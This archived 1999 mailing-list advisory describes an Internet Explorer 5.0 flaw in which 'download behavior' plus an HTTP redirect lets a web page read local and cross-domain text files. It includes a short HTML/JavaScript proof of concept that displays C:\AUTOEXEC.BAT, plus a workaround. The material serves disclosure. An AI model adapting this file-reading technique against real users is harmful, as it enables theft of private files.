IE 5.0 security vulnerability - reading local (and from any

From: Georgi Guninski (joroat_private)
Date: Mon Sep 27 1999 - 05:04:44 PDT

Next message: Bluefish: "[EuroHaCk] Linux 2.2.x ISN vulnerability (fwd)"

Previous message: PinkFreud: "Sun recommends users run 'xhost +' in StarOffice FAQ"
Next in thread: Fülöp Mikló: "Re: IE 5.0 security vulnerability - reading local (and from any"
Reply: Fülöp Mikló: "Re: IE 5.0 security vulnerability - reading local (and from any"
Reply: Ben Greenbaum: "Re: IE 5.0 security vulnerability - reading local (and from any"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

IE 5.0 security vulnerability - reading local (and from any domain) text
files using "download behavior"

Disclaimer:
The opinions expressed in this advisory and program are my own and not
of any company.
The usual standard disclaimer applies, especially the fact that Georgi
Guninski
is not liable for any damages caused by direct or  indirect use of the
information or functionality provided by this program.
Georgi Guninski, bears NO responsibility for content or misuse of this
program or any derivatives thereof.

Description:

Internet Explorer 5.0 under Windows 95 and Windows NT 4.0 (suppose Win98
is vulnerable)
allows reading local text files (the extension does not matter) and
parts of binary files.
It is also possible to read text files from any domain and in some cases
reading files from a web server behind a firewall.

Details:

The problem is the IE feature "download behavior".
It is possible to click on a link and a callback function to be
executed.
When the callback function is executed by "startDownload" method, the
downloaded file is passed as an argument to the callback function.
Microsoft has implemented some security which does not allow downloading
files in this way from a different domain.
But if the link points to a file in same domain as the exploit page and
a HTTP redirect is forced,
then the exploit works.
It is not necessary the user to click on the link, this may be done
automatically.
This vulnerability may be exploited using HTML email message or a
newsgroup posting.

The code is:
----------------------------------------------------------------------------------------
<SCRIPT>
function doit(s)
{
 alert ("Here is your file:\n"+s);
}
</SCRIPT>
<A ID="oD" STYLE="behavior:url(#default#download)"
HREF="javascript:oD.startDownload('http://www.nat.bg/~joro/reject.cgi?autoexec',
doit)">Click here to read C:\AUTOEXEC.BAT</A>.
----------------------------------------------------------------------------------------
("http://www.nat.bg/~joro/reject.cgi?autoexec" just does a HTTP redirect
to file://c:/autoexec.bat)

Workaround:
Disable Active Scripting

Demonstration is available at http://www.nat.bg/~joro/download2.html


Regards,
Georgi Guninski
http://www.nat.bg/~joro

Next message: Bluefish: "[EuroHaCk] Linux 2.2.x ISN vulnerability (fwd)"
Previous message: PinkFreud: "Sun recommends users run 'xhost +' in StarOffice FAQ"
Next in thread: Fülöp Mikló: "Re: IE 5.0 security vulnerability - reading local (and from any"
Reply: Fülöp Mikló: "Re: IE 5.0 security vulnerability - reading local (and from any"
Reply: Ben Greenbaum: "Re: IE 5.0 security vulnerability - reading local (and from any"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:05:28 PDT